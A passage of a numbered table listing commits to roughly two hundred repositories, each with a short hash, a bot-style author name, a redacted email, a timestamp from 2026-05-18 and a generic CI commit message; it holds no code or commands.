| 1378 | pranto2051/youtube-full-corce | 3e34dc86fbc1 | build-bot | [email protected] | 2026-05-18T14:13:15.000Z | chore: optimize pipeline runtime |
| 1379 | David-Irihose/secure_vault | 3e37bfd2300c | auto-ci | [email protected] | 2026-05-18T13:28:52.000Z | chore: optimize pipeline runtime |
| 1380 | walasee/aws-native-cicd-pipeline-project | 3e4224a660ea | build-bot | [email protected] | 2026-05-18T16:06:20.000Z | chore: update ci/cd pipeline |
| 1381 | musatekin/dockerimagehub | 3e4342b7ae9e | auto-ci | [email protected] | 2026-05-18T17:03:38.000Z | chore: sync ci configuration |
| 1382 | harshNaik99/freeLancingTechnicalRecruiter | 3e4866c44e7a | ci-bot | [email protected] | 2026-05-18T16:04:33.000Z | chore: update ci/cd pipeline |
| 1383 | matir-bank/matirbank-spring | 3e4b2664b2ec | build-bot | [email protected] | 2026-05-18T15:38:57.000Z | chore: update ci/cd pipeline |
| 1384 | reversing2002/notam-manager | 3e4ee78c105e | ci-bot | [email protected] | 2026-05-18T11:52:59.000Z | chore: optimize pipeline runtime |
| 1385 | osamahkenawy/traseallo-driver-app | 3e5b86399447 | pipeline-bot | [email protected] | 2026-05-18T15:06:49.000Z | chore: optimize pipeline runtime |
| 1386 | OlliUlku/Matopeli | 3e5e7791c00c | ci-bot | [email protected] | 2026-05-18T12:50:58.000Z | ci: update build config |
| 1387 | arj1211/shell-utils | 3e6596265f4d | auto-ci | [email protected] | 2026-05-18T15:49:11.000Z | chore: update ci/cd pipeline |
| 1388 | SaiDheeraj-19/Smart-Energy-Optimization-System | 3e93c219ad3b | pipeline-bot | [email protected] | 2026-05-18T15:47:01.000Z | chore: optimize pipeline runtime |
| 1389 | chicoluan/parameter-golf | 3e93e2e3a3fe | pipeline-bot | [email protected] | 2026-05-18T12:21:24.000Z | chore: sync ci configuration |
| 1390 | Shirley940613/hao1140615.Github.io | 3e9fbc95add3 | pipeline-bot | [email protected] | 2026-05-18T13:56:31.000Z | ci: update build config |
| 1391 | aleTurtle/pr24ids | 3ea38a0402e9 | build-bot | [email protected] | 2026-05-18T16:54:04.000Z | build: improve ci performance |
| 1392 | ahtisham02/realtime-pusher-products | 3ecccd6c4dfe | build-bot | [email protected] | 2026-05-18T15:20:58.000Z | chore: update ci/cd pipeline |
| 1393 | jakhadakash/HelloWorld | 3ed5d6b0f8f3 | auto-ci | [email protected] | 2026-05-18T14:58:08.000Z | ci: add build optimization step |
| 1394 | EnamulBokshi/vehicle-rental-system | 3ef00f4d1c8d | pipeline-bot | [email protected] | 2026-05-18T15:30:13.000Z | chore: optimize pipeline runtime |
| 1395 | tegheff/CrimeAnalytics_ML_Model | 3f17f0e73e4e | auto-ci | [email protected] | 2026-05-18T16:23:04.000Z | ci: update build config |
| 1396 | KryptonZQ/student_dashboard | 3f22ad4c043d | auto-ci | [email protected] | 2026-05-18T12:51:17.000Z | ci: update build config |
| 1397 | anshvarma07/QRaftPayGit | 3f297e7708a0 | ci-bot | [email protected] | 2026-05-18T13:36:14.000Z | fix: correct build workflow |
| 1398 | ShayanHasanKhan0/LeetCodeCPP | 3f432d3396c2 | ci-bot | [email protected] | 2026-05-18T16:50:15.000Z | chore: update ci/cd pipeline |
| 1399 | amitos80/iron-swords-missing | 3f456f152e3d | build-bot | [email protected] | 2026-05-18T13:52:07.000Z | ci: update build config |
| 1400 | aurore017/alu-back-end | 3f86b2465df6 | auto-ci | [email protected] | 2026-05-18T13:28:15.000Z | ci: update build config |
| 1401 | manavkumar-cpu/jigyasa-backup | 3f8b831e5def | ci-bot | [email protected] | 2026-05-18T13:02:53.000Z | chore: update ci/cd pipeline |
| 1402 | epd19/test-action-1779100547104771392 | 3f9020bfc5eb | ci-bot | [email protected] | 2026-05-18T13:38:21.000Z | chore: update ci/cd pipeline |
| 1403 | Asultop/Proxy_Pixiv_Github | 3f9bef451a01 | auto-ci | [email protected] | 2026-05-18T12:44:28.000Z | ci: add build optimization step |
| 1404 | youaremywind/MeterReading | 3fa1bbcd94c5 | pipeline-bot | [email protected] | 2026-05-18T12:53:28.000Z | chore: optimize pipeline runtime |
| 1405 | LucaVerghelet/bycicle-haptic-navigation | 3faeed98fd3d | build-bot | [email protected] | 2026-05-18T13:35:24.000Z | ci: update build config |
| 1406 | SaraNabil/ToDoList_App | 3fb22a5e3aae | pipeline-bot | [email protected] | 2026-05-18T16:14:19.000Z | chore: update ci/cd pipeline |
| 1407 | Wanghley/edge-trust-offload | 3fb2deaa556f | pipeline-bot | [email protected] | 2026-05-18T14:00:54.000Z | chore: sync ci configuration |
| 1408 | just-abdullah-dev/read-verve-next-js | 3fb82c4b93a5 | ci-bot | [email protected] | 2026-05-18T13:57:47.000Z | fix: correct build workflow |
| 1409 | UJ911/Implied-volitility-prediction-goquant | 3fd5665af65b | ci-bot | [email protected] | 2026-05-18T13:38:18.000Z | fix: correct build workflow |
| 1410 | Bekir-Caglar/CSC_Git-Github_Sunu | 3fe992454b2f | pipeline-bot | [email protected] | 2026-05-18T13:13:58.000Z | chore: optimize pipeline runtime |
| 1411 | ho-cyber/Squid | 3ff3f30fa3cd | build-bot | [email protected] | 2026-05-18T17:28:43.000Z | ci: update build config |
| 1412 | harshNaik99/shoes | 4000db007003 | build-bot | [email protected] | 2026-05-18T16:05:25.000Z | build: improve ci performance |
| 1413 | mwinterstorm/macdrip | 400ffd6be4e3 | build-bot | [email protected] | 2026-05-18T13:09:04.000Z | ci: update build config |
| 1414 | bashenko/wg-db | 401b175ae5b0 | build-bot | [email protected] | 2026-05-18T17:33:06.000Z | ci: add build optimization step |
| 1415 | PraTiK-2069/test-action-1778960008489791638 | 402286dd096d | ci-bot | [email protected] | 2026-05-18T16:42:24.000Z | chore: optimize pipeline runtime |
| 1416 | vkuznet/ErrorTransformer | 402bac6e15a5 | build-bot | [email protected] | 2026-05-18T13:46:40.000Z | build: improve ci performance |
| 1417 | yashlad27/shardstore | 4041321a62cd | ci-bot | [email protected] | 2026-05-18T13:26:08.000Z | fix: correct build workflow |
| 1418 | zaunere/kwg | 40486a7376c0 | auto-ci | [email protected] | 2026-05-18T13:30:51.000Z | ci: update build config |
| 1419 | saksham-tech/aaps- | 40504d13c46d | pipeline-bot | [email protected] | 2026-05-18T17:13:25.000Z | fix: correct build workflow |
| 1420 | andersonphiri/dsa | 4058ac1d0ea7 | pipeline-bot | [email protected] | 2026-05-18T13:56:22.000Z | ci: add build optimization step |
| 1421 | IracyMaia/CleanTypesSpecies | 406e86ab723b | pipeline-bot | [email protected] | 2026-05-18T14:07:26.000Z | chore: optimize pipeline runtime |
| 1422 | Yamada731/C-Programming | 4075e38f223f | pipeline-bot | [email protected] | 2026-05-18T13:55:49.000Z | fix: correct build workflow |
| 1423 | pareesa969/my-portfolio-website | 407979819f2b | ci-bot | [email protected] | 2026-05-18T13:46:12.000Z | chore: optimize pipeline runtime |
| 1424 | leytomfernando-droid/test-action-1779100547152291988 | 408456f65fec | pipeline-bot | [email protected] | 2026-05-18T16:54:50.000Z | chore: sync ci configuration |
| 1425 | edrichard/test-action-1762423295924154000 | 40945a1ca114 | auto-ci | [email protected] | 2026-05-18T16:02:15.000Z | fix: correct build workflow |
| 1426 | ChandrakanthSabnekar/test-action-58180a80b03e | 40ace8eba45c | auto-ci | [email protected] | 2026-05-18T13:51:17.000Z | fix: correct build workflow |
| 1427 | git-init-priyanshu/FundX-Dapp | 40b387c26ec3 | auto-ci | [email protected] | 2026-05-18T17:38:39.000Z | build: improve ci performance |
| 1428 | abhinavhello/test-action-1778966162067323539 | 40cf89964bf5 | auto-ci | [email protected] | 2026-05-18T12:01:09.000Z | fix: correct build workflow |
| 1429 | isaac372/analizador-lexico | 40ed05ce17f7 | build-bot | [email protected] | 2026-05-18T13:03:04.000Z | chore: update ci/cd pipeline |
| 1430 | Owolabi5541/portfolio-v3 | 41015e45b60f | ci-bot | [email protected] | 2026-05-18T13:59:18.000Z | build: improve ci performance |
| 1431 | parity-bit/soc | 410935e05424 | build-bot | [email protected] | 2026-05-18T15:22:44.000Z | chore: update ci/cd pipeline |
| 1432 | ANDREWTENAJEROS/webdev-midtermexam | 412af3bf1cc0 | auto-ci | [email protected] | 2026-05-18T15:51:04.000Z | fix: correct build workflow |
| 1433 | 0xdps/basic-webpack | 4130b933876a | build-bot | [email protected] | 2026-05-18T14:02:41.000Z | chore: optimize pipeline runtime |
| 1434 | Ashwiin/LeetCode-0027 | 4139ab9192b1 | pipeline-bot | [email protected] | 2026-05-18T16:49:34.000Z | chore: update ci/cd pipeline |
| 1435 | abhinavhello/abhinav-demo | 4141369ba690 | build-bot | [email protected] | 2026-05-18T12:07:58.000Z | chore: update ci/cd pipeline |
| 1436 | git-init-priyanshu/Docx | 41440bb5dc12 | ci-bot | [email protected] | 2026-05-18T16:38:10.000Z | chore: sync ci configuration |
| 1437 | Stat184-Spring2025/Sec1_FP_Tim_Ying_Mohammed | 414410b43a10 | build-bot | [email protected] | 2026-05-18T12:14:11.000Z | ci: add build optimization step |
| 1438 | CodenSic/invoice-receipt-generator | 41448283b2e7 | auto-ci | [email protected] | 2026-05-18T13:07:28.000Z | build: improve ci performance |
| 1439 | umakantmukhiya/Leetcode | 41662eeb90aa | auto-ci | [email protected] | 2026-05-18T15:45:22.000Z | chore: update ci/cd pipeline |
| 1440 | EnamulBokshi/airport-ms | 416f3c457cae | ci-bot | [email protected] | 2026-05-18T15:34:11.000Z | build: improve ci performance |
| 1441 | ConnectSiteForge/docs-2i0kru | 41847d2b376d | pipeline-bot | [email protected] | 2026-05-18T14:35:45.000Z | fix: correct build workflow |
| 1442 | NicolNonga/productive_app_frontend | 418644e0bca1 | ci-bot | [email protected] | 2026-05-18T12:18:58.000Z | chore: optimize pipeline runtime |
| 1443 | zaunere/liveshared | 4198fbcfd893 | ci-bot | [email protected] | 2026-05-18T13:33:59.000Z | chore: update ci/cd pipeline |
| 1444 | umakantmukhiya/vscodecpp | 419a30cdbe43 | auto-ci | [email protected] | 2026-05-18T15:47:57.000Z | build: improve ci performance |
| 1445 | vrct07/projetos-em-js | 419dc94ba942 | pipeline-bot | [email protected] | 2026-05-18T14:25:36.000Z | ci: add build optimization step |
| 1446 | andersonphiri/algorithmsImplementation_dotnet3.1 | 41b5e4f0c06e | auto-ci | [email protected] | 2026-05-18T13:59:36.000Z | chore: sync ci configuration |
| 1447 | DS-FoodRush/foodRush-be | 41bb9b47cbb3 | build-bot | [email protected] | 2026-05-18T14:01:51.000Z | ci: add build optimization step |
| 1448 | naveenld024/movie | 41bd73910ff1 | auto-ci | [email protected] | 2026-05-18T13:27:06.000Z | ci: add build optimization step |
| 1449 | PeterTokmakov/ci-pipeline | 41c21f8b36a9 | auto-ci | [email protected] | 2026-05-18T11:50:55.000Z | chore: optimize pipeline runtime |
| 1450 | VrajPatelK/Portfolio | 41c5577df23d | ci-bot | [email protected] | 2026-05-18T12:46:09.000Z | ci: add build optimization step |
| 1451 | Husam-AbuZina/RBACSystem | 41d77cbdb6ae | auto-ci | [email protected] | 2026-05-18T12:28:04.000Z | chore: update ci/cd pipeline |
| 1452 | kayosama007/ci-build-0038 | 41dc8edd4faa | ci-bot | [email protected] | 2026-05-18T14:26:50.000Z | build: improve ci performance |
| 1453 | senithudara/ElectriGen-ICS | 41ddc7920619 | pipeline-bot | [email protected] | 2026-05-18T14:06:28.000Z | ci: update build config |
| 1454 | CreativeMasterBonin/thingamajigscomestibles | 41ec108bddd5 | ci-bot | [email protected] | 2026-05-18T14:06:48.000Z | chore: optimize pipeline runtime |
| 1455 | MoustafaElsaghier/OrientationDetector | 41fe781040fb | build-bot | [email protected] | 2026-05-18T15:36:00.000Z | ci: update build config |
| 1456 | shkshakhawat/firstdata-ipgconnect-magento | 4210f3560d8e | auto-ci | [email protected] | 2026-05-18T17:23:11.000Z | chore: sync ci configuration |
| 1457 | Debbatisudheer/Dijkstra-s-algorithm | 4218b7a80a95 | pipeline-bot | [email protected] | 2026-05-18T17:35:34.000Z | ci: add build optimization step |
| 1458 | qSckd/LOLMotd | 421b00dd9374 | build-bot | [email protected] | 2026-05-18T14:11:19.000Z | fix: correct build workflow |
| 1459 | xelanuges/xelanuges.github.io | 421b3765252b | ci-bot | [email protected] | 2026-05-18T13:06:55.000Z | build: improve ci performance |
| 1460 | MoustafaElsaghier/CornetAppTask | 422b5eaf2137 | ci-bot | [email protected] | 2026-05-18T15:34:53.000Z | chore: optimize pipeline runtime |
| 1461 | Lhagvaa0102/InputSelector | 423525b53eba | auto-ci | [email protected] | 2026-05-18T15:49:12.000Z | fix: correct build workflow |
| 1462 | cybxrrgsouraabh/Agent-Recon | 423a7ee997f8 | auto-ci | [email protected] | 2026-05-18T12:14:58.000Z | ci: add build optimization step |
| 1463 | mk016/Smart-Timetable-Management-System--STMS- | 423c969bff48 | ci-bot | [email protected] | 2026-05-18T16:31:39.000Z | build: improve ci performance |
| 1464 | kayosama007/ci-build-20260329-190456-6179 | 424917e739af | auto-ci | [email protected] | 2026-05-18T14:23:37.000Z | ci: update build config |
| 1465 | fadexadex/whisper.cpp | 42492447361b | ci-bot | [email protected] | 2026-05-18T17:41:12.000Z | build: improve ci performance |
| 1466 | Reflectedsd/Murder-Crysis | 424c69b9701b | ci-bot | [email protected] | 2026-05-18T15:34:15.000Z | build: improve ci performance |
| 1467 | cjkolb27/arduino_clock | 4251eab9fb06 | auto-ci | [email protected] | 2026-05-18T16:28:42.000Z | fix: correct build workflow |
| 1468 | getakalabs/nclex311 | 426d0db8ddac | auto-ci | [email protected] | 2026-05-18T16:06:50.000Z | build: improve ci performance |
| 1469 | walasee/Ventura-Project--Cloudformation | 426e46046bc3 | ci-bot | [email protected] | 2026-05-18T16:08:18.000Z | ci: add build optimization step |
| 1470 | jakhadakash/readme-ffzyek | 4271acfea8a7 | build-bot | [email protected] | 2026-05-18T14:56:19.000Z | ci: update build config |
| 1471 | jsged/password-guesser | 42743f811bc9 | auto-ci | [email protected] | 2026-05-18T17:13:35.000Z | ci: update build config |
| 1472 | yashlad27/astro-blog-weapon | 427ffcb2df5f | ci-bot | [email protected] | 2026-05-18T13:26:22.000Z | chore: optimize pipeline runtime |
| 1473 | MaximKabaev/claude-n8n-bridge | 428a0e19bc99 | auto-ci | [email protected] | 2026-05-18T14:25:51.000Z | ci: add build optimization step |
| 1474 | muhammadhammadd7/silkfps | 428a15924ff5 | ci-bot | [email protected] | 2026-05-18T13:46:13.000Z | ci: add build optimization step |
| 1475 | juani0824/FaceCook | 428cae5a384f | build-bot | [email protected] | 2026-05-18T16:18:27.000Z | chore: sync ci configuration |
| 1476 | senithudara/CTSE-lab05-microservices | 428f7179f76c | build-bot | [email protected] | 2026-05-18T13:57:30.000Z | fix: correct build workflow |
| 1477 | panyapat12345/ComputerArchitectureProject | 429a365fa7cd | ci-bot | [email protected] | 2026-05-18T12:48:35.000Z | build: improve ci performance |
| 1478 | azimsidd/newsapp_mvvm | 42b4600ddaed | ci-bot | [email protected] | 2026-05-18T13:23:06.000Z | build: improve ci performance |
| 1479 | syedfakhar25/KLMS | 42b46b8154b1 | pipeline-bot | [email protected] | 2026-05-18T13:34:09.000Z | chore: optimize pipeline runtime |
| 1480 | roydellclarke/myRails | 42b74ef8b707 | auto-ci | [email protected] | 2026-05-18T13:05:13.000Z | fix: correct build workflow |
| 1481 | aligilan/loading | 42bb6101b72a | pipeline-bot | [email protected] | 2026-05-18T16:09:53.000Z | ci: add build optimization step |
| 1482 | serena0322/CroceRossa | 42c09fad24be | build-bot | [email protected] | 2026-05-18T12:55:34.000Z | chore: sync ci configuration |
| 1483 | Rajesh0055/test-action-1778960691833289010 | 42d76871e1c8 | auto-ci | [email protected] | 2026-05-18T13:34:39.000Z | fix: correct build workflow |
| 1484 | Black-Iron-Project/lineage-sdk | 42d8eca9703b | build-bot | [email protected] | 2026-05-18T17:40:22.000Z | build: improve ci performance |
| 1485 | codehalic/workshop-typescript-presentation | 42df499cdca5 | auto-ci | [email protected] | 2026-05-18T12:53:27.000Z | ci: add build optimization step |
| 1486 | riomukhtarom/NameCard | 42eaa706db30 | ci-bot | [email protected] | 2026-05-18T15:48:30.000Z | fix: correct build workflow |
| 1487 | Exp-Primer-Copilot-Cohort-1/experience-primer-copilot-gottaegbert | 430233ed307c | pipeline-bot | [email protected] | 2026-05-18T16:59:00.000Z | chore: optimize pipeline runtime |
| 1488 | AmarKumarShaw/leonardo_proj | 430c37cbec86 | build-bot | [email protected] | 2026-05-18T12:17:16.000Z | build: improve ci performance |
| 1489 | S-Abrar/Smart-Timetable-Flutter-App | 430e8d4087e3 | build-bot | [email protected] | 2026-05-18T12:55:13.000Z | ci: update build config |
| 1490 | AmarKumarShaw/tuna-project | 431877d782e6 | ci-bot | [email protected] | 2026-05-18T12:13:40.000Z | chore: sync ci configuration |
| 1491 | dpaetsch/dpaetsch.github.io | 43263d3d4073 | ci-bot | [email protected] | 2026-05-18T13:30:19.000Z | ci: update build config |
| 1492 | Davidf2004/test-action-1778957507982868547 | 433a33c99b2c | auto-ci | [email protected] | 2026-05-18T17:03:04.000Z | chore: optimize pipeline runtime |
| 1493 | elmizan/nextjs-blog | 4340443dba1e | ci-bot | [email protected] | 2026-05-18T11:46:02.000Z | build: improve ci performance |
| 1494 | ahtisham02/hassan-fyp-ecom | 434882a1b3c5 | ci-bot | [email protected] | 2026-05-18T15:32:44.000Z | fix: correct build workflow |
| 1495 | qtuong180402/Tetris_OOP | 435038d86b81 | ci-bot | [email protected] | 2026-05-18T13:41:18.000Z | chore: optimize pipeline runtime |
| 1496 | Raysharr/simple-calendar | 4363b82e2b35 | ci-bot | [email protected] | 2026-05-18T12:24:12.000Z | chore: sync ci configuration |
| 1497 | umairabhatti786/test-action-1778963955835649198 | 4368c9fcd423 | pipeline-bot | [email protected] | 2026-05-18T12:30:29.000Z | chore: sync ci configuration |
| 1498 | git-malik/MTSS-a1 | 436d796b29b5 | pipeline-bot | [email protected] | 2026-05-18T12:29:28.000Z | ci: add build optimization step |
| 1499 | jongsun-park/portfolio-gatsby | 4374776966d6 | auto-ci | [email protected] | 2026-05-18T16:20:52.000Z | chore: optimize pipeline runtime |
| 1500 | SaiDheeraj-19/GPCET-Code-Arena | 4376c747baa7 | auto-ci | [email protected] | 2026-05-18T15:49:48.000Z | fix: correct build workflow |
| 1501 | BienG3Rd/hello.js | 437823915427 | build-bot | [email protected] | 2026-05-18T16:23:13.000Z | ci: add build optimization step |
| 1502 | alice-king/Actions | 439890538f5d | auto-ci | [email protected] | 2026-05-18T12:23:56.000Z | fix: correct build workflow |
| 1503 | huyixi/capmind | 43a7ce2bf817 | build-bot | [email protected] | 2026-05-18T13:25:55.000Z | chore: optimize pipeline runtime |
| 1504 | pranto2051/protfolio_02 | 43a8cf43796e | ci-bot | [email protected] | 2026-05-18T14:04:23.000Z | ci: update build config |
| 1505 | afhex/carnet_casa_abierta | 43b550ab302a | pipeline-bot | [email protected] | 2026-05-18T13:16:36.000Z | ci: update build config |
| 1506 | kayosama007/ci-build-20260329-185942-9424 | 43b64920d3ba | ci-bot | [email protected] | 2026-05-18T14:25:09.000Z | ci: add build optimization step |
| 1507 | cevichelabs/romeroruiz.com | 43c32b202a57 | build-bot | [email protected] | 2026-05-18T15:51:32.000Z | fix: correct build workflow |
| 1508 | Husam-AbuZina/React-TodoList-Project | 43c750f4bbc3 | auto-ci | [email protected] | 2026-05-18T12:24:30.000Z | chore: update ci/cd pipeline |
| 1509 | umakantmukhiya/test-action-1779100547195808770 | 43cac1a83843 | auto-ci | [email protected] | 2026-05-18T15:41:20.000Z | ci: update build config |
| 1510 | techmodel/techmodel-back | 43cfffa969e0 | build-bot | [email protected] | 2026-05-18T13:47:02.000Z | ci: add build optimization step |
| 1511 | l8yh1/muzan | 43e2e0c56973 | pipeline-bot | [email protected] | 2026-05-18T17:21:35.000Z | fix: correct build workflow |
| 1512 | TharunReddy4321/Github-Actions-Pythonapp | 43e2f78cca77 | auto-ci | [email protected] | 2026-05-18T16:31:46.000Z | chore: update ci/cd pipeline |
| 1513 | trixobird/coursera-algorithms-i | 43e3224d4532 | auto-ci | [email protected] | 2026-05-18T14:44:31.000Z | ci: update build config |
| 1514 | theabhinavpal/MedRemind | 43f36d1bfc29 | ci-bot | [email protected] | 2026-05-18T16:01:27.000Z | fix: correct build workflow |
| 1515 | Online-Shop-Backend/Backend | 43f91777ff30 | ci-bot | [email protected] | 2026-05-18T13:06:50.000Z | fix: correct build workflow |
| 1516 | naveenld024/pixs-legal | 440cad26772d | auto-ci | [email protected] | 2026-05-18T13:26:51.000Z | build: improve ci performance |
| 1517 | prasiddhp10/broadcast-engineering-portal | 440dfdd8a695 | auto-ci | [email protected] | 2026-05-18T12:40:03.000Z | ci: add build optimization step |
| 1518 | FalconNetCohort/FalconGPT | 4421393d6c93 | ci-bot | [email protected] | 2026-05-18T16:10:16.000Z | ci: add build optimization step |
| 1519 | lucky-hw-kim/todoList | 44310aa9f1ac | build-bot | [email protected] | 2026-05-18T12:41:34.000Z | fix: correct build workflow |
| 1520 | MeetBagda/ROAD-CONDITION-DETECTION | 4433224df4bc | ci-bot | [email protected] | 2026-05-18T12:10:29.000Z | build: improve ci performance |
| 1521 | KryptonZQ/foailab700 | 443ce360b76c | pipeline-bot | [email protected] | 2026-05-18T12:50:44.000Z | build: improve ci performance |
| 1522 | nebink/Ml-Models | 44476f69ca6d | build-bot | [email protected] | 2026-05-18T12:14:14.000Z | chore: sync ci configuration |
| 1523 | chicoluan/frontend-challenge | 444b36427df2 | auto-ci | [email protected] | 2026-05-18T12:21:39.000Z | chore: optimize pipeline runtime |
| 1524 | ibrahiemhss/RNBoilerplate | 444d2c12cd6c | pipeline-bot | [email protected] | 2026-05-18T13:59:01.000Z | ci: update build config |
| 1525 | semacu/202105-data-science-python | 445e02ad0b6f | build-bot | [email protected] | 2026-05-18T15:42:31.000Z | chore: sync ci configuration |
| 1526 | Debbatisudheer/Work-summary | 445e4b72dfed | build-bot | [email protected] | 2026-05-18T17:18:55.000Z | chore: update ci/cd pipeline |
| 1527 | ammadey7/ammadey | 445f575eefbc | auto-ci | [email protected] | 2026-05-18T13:13:53.000Z | build: improve ci performance |
| 1528 | sahidDev09/Chat-application-WS | 44708e64d882 | pipeline-bot | [email protected] | 2026-05-18T16:08:07.000Z | chore: optimize pipeline runtime |
| 1529 | LuciferVid/KhalidDataAnalysis_TeamTheFuhrers | 4483be5402ac | build-bot | [email protected] | 2026-05-18T12:01:54.000Z | ci: add build optimization step |
| 1530 | Ediekkhan/launchpad-project | 448fddb90c4b | build-bot | [email protected] | 2026-05-18T13:44:30.000Z | ci: add build optimization step |
| 1531 | persian-tools/go-persian-tools | 44939d93adb4 | ci-bot | [email protected] | 2026-05-18T12:53:23.000Z | chore: update ci/cd pipeline |
| 1532 | pranto2051/school | 44a80cee7e51 | pipeline-bot | [email protected] | 2026-05-18T14:15:22.000Z | chore: update ci/cd pipeline |
| 1533 | BryanAlexanderSantoso/Product-Page-By-Pilar | 44ae25da1cc5 | build-bot | [email protected] | 2026-05-18T13:51:53.000Z | chore: optimize pipeline runtime |
| 1534 | noushiFlex/py-team | 44b97cd7a29f | auto-ci | [email protected] | 2026-05-18T17:36:04.000Z | chore: optimize pipeline runtime |
| 1535 | sap-contributions/renovate-devcontainer | 44c68c03ec32 | ci-bot | [email protected] | 2026-05-18T14:08:02.000Z | fix: correct build workflow |
| 1536 | RameshRukshan/CW2PTestLpage | 44e2b09fdbcb | build-bot | [email protected] | 2026-05-18T17:43:48.000Z | build: improve ci performance |
| 1537 | Akisan98/udemy | 44f5f20bd4bc | auto-ci | [email protected] | 2026-05-18T14:03:38.000Z | chore: sync ci configuration |
| 1538 | just-abdullah-dev/cloud | 45047315a1f6 | pipeline-bot | [email protected] | 2026-05-18T13:53:56.000Z | ci: add build optimization step |
| 1539 | Mostakim0978/Nayan-bot | 45067ad65332 | ci-bot | [email protected] | 2026-05-18T11:47:19.000Z | chore: optimize pipeline runtime |
| 1540 | brahamandAI/connectflow | 450aba424a67 | ci-bot | [email protected] | 2026-05-18T11:51:54.000Z | chore: update ci/cd pipeline |
| 1541 | smit-sk/Data-Science | 451bf7cb2dce | build-bot | [email protected] | 2026-05-18T16:22:20.000Z | build: improve ci performance |
| 1542 | just-abdullah-dev/blog-website-server | 451d27a66237 | auto-ci | [email protected] | 2026-05-18T13:58:00.000Z | ci: add build optimization step |
| 1543 | DellerbaRobotics/Dino_Hand_Game | 45273b5f8786 | build-bot | [email protected] | 2026-05-18T12:51:22.000Z | chore: optimize pipeline runtime |
| 1544 | huyixi/side-toc | 45291a4df5fc | auto-ci | [email protected] | 2026-05-18T13:41:42.000Z | chore: update ci/cd pipeline |
| 1545 | kayosama007/ci-build-0039 | 452a5cf5051d | build-bot | [email protected] | 2026-05-18T14:26:47.000Z | ci: add build optimization step |
| 1546 | arj1211/water-sort | 452f06d1f075 | auto-ci | [email protected] | 2026-05-18T15:41:11.000Z | chore: optimize pipeline runtime |
| 1547 | HarshAgnihotri9/React-learning | 4533afd35a7a | pipeline-bot | [email protected] | 2026-05-18T12:17:37.000Z | fix: correct build workflow |
| 1548 | Srj-Love/Lakhmi_Chand_Granthavali | 4553d0b18bf2 | build-bot | [email protected] | 2026-05-18T12:51:34.000Z | ci: add build optimization step |
| 1549 | Fablelie/SpaceShip_internship_Ringzero | 455e65ccb21f | pipeline-bot | [email protected] | 2026-05-18T17:19:59.000Z | chore: sync ci configuration |
| 1550 | Mohan2200031661/petfriender-client | 456bba8193f5 | auto-ci | [email protected] | 2026-05-18T12:58:27.000Z | chore: sync ci configuration |
| 1551 | nnfuad/1.2-java-codes | 456dc813ac61 | auto-ci | [email protected] | 2026-05-18T13:30:30.000Z | chore: sync ci configuration |
| 1552 | PyreX00/YetiGrowth1 | 456eab6d5caa | pipeline-bot | [email protected] | 2026-05-18T12:01:38.000Z | chore: optimize pipeline runtime |
| 1553 | Devanshu-code/Loan-Recovery-Detection- | 457102569947 | auto-ci | [email protected] | 2026-05-18T13:43:09.000Z | ci: update build config |
| 1554 | just-abdullah-dev/ip-dns-ssl-lookup | 4580e742174f | pipeline-bot | [email protected] | 2026-05-18T13:56:17.000Z | chore: update ci/cd pipeline |
| 1555 | just-abdullah-dev/TicTacToe-Game | 4586e6179363 | build-bot | [email protected] | 2026-05-18T13:59:04.000Z | chore: optimize pipeline runtime |
| 1556 | rickastley87/test-action-1778964631169579625 | 458b4277969b | auto-ci | [email protected] | 2026-05-18T12:01:20.000Z | chore: optimize pipeline runtime |
| 1557 | fadexadex/Forge | 458bd0945716 | pipeline-bot | [email protected] | 2026-05-18T17:19:30.000Z | chore: optimize pipeline runtime |
| 1558 | hawaripro/distrocloth | 45af5e49ae4f | auto-ci | [email protected] | 2026-05-18T13:46:51.000Z | chore: update ci/cd pipeline |
| 1559 | AmarKumarShaw/test-action-1778966162141139831 | 45c065611bf2 | ci-bot | [email protected] | 2026-05-18T11:58:56.000Z | chore: optimize pipeline runtime |
| 1560 | nebink/King-County-House-sales-Dashboard | 45dbde47a707 | pipeline-bot | [email protected] | 2026-05-18T12:16:29.000Z | chore: sync ci configuration |
| 1561 | yashlad27/SummerScout25 | 45dc374b4ade | ci-bot | [email protected] | 2026-05-18T13:25:31.000Z | chore: sync ci configuration |
| 1562 | Devanshu-code/Absoption-coefficient- | 45dc9e402aaf | auto-ci | [email protected] | 2026-05-18T13:42:28.000Z | chore: update ci/cd pipeline |
| 1563 | BrenoPVM/Escultor3Dp3 | 45ec962410f2 | build-bot | [email protected] | 2026-05-18T15:32:52.000Z | build: improve ci performance |
| 1564 | MatteScalda/oop-prolog | 4600029fcf18 | auto-ci | [email protected] | 2026-05-18T14:07:46.000Z | chore: optimize pipeline runtime |
| 1565 | HamzaElMkhantar/Mongoose-Checkpoint | 46104d55f64b | pipeline-bot | [email protected] | 2026-05-18T17:23:54.000Z | chore: optimize pipeline runtime |
| 1566 | raffaelramalhorosa/nexosgg.com | 461a22304d5f | pipeline-bot | [email protected] | 2026-05-18T12:06:12.000Z | chore: optimize pipeline runtime |
| 1567 | Ediekkhan/edikano_portfolio | 4624f8d6040d | auto-ci | [email protected] | 2026-05-18T13:43:33.000Z | fix: correct build workflow |
| 1568 | An63llvs/test-action-1778963955642971313 | 463b15a26600 | pipeline-bot | [email protected] | 2026-05-18T12:13:16.000Z | fix: correct build workflow |
| 1569 | Jawad-23/Events_Management | 4643e25f5637 | auto-ci | [email protected] | 2026-05-18T13:19:01.000Z | ci: add build optimization step |
| 1570 | BryanAlexanderSantoso/StarWars-Template-By-Pilar | 46474382cc01 | ci-bot | [email protected] | 2026-05-18T13:53:36.000Z | chore: update ci/cd pipeline |
| 1571 | Mostakim0978/Bot404 | 4656d2121201 | auto-ci | [email protected] | 2026-05-18T11:45:23.000Z | ci: add build optimization step |
| 1572 | Heseela/DemoPOS | 4657b61341d1 | build-bot | [email protected] | 2026-05-18T12:11:02.000Z | build: improve ci performance |
| 1573 | RuchirKadam1729/input | 465e60e65b35 | pipeline-bot | [email protected] | 2026-05-18T12:58:19.000Z | chore: optimize pipeline runtime |
| 1574 | anibeladjei/Group-4-P1 | 465ea23c080c | pipeline-bot | [email protected] | 2026-05-18T13:40:34.000Z | chore: sync ci configuration |
| 1575 | Len-168/ASP.NET-Jwt | 4662c7cdb11c | pipeline-bot | [email protected] | 2026-05-18T13:16:39.000Z | build: improve ci performance |
| 1576 | alexmagwe/chatbot | 467969df2b64 | auto-ci | [email protected] | 2026-05-18T12:57:58.000Z | ci: update build config |
| 1577 | jenna-studio/alfred-colortohex | 4696f29a6cb5 | build-bot | [email protected] | 2026-05-18T12:24:50.000Z | fix: correct build workflow |
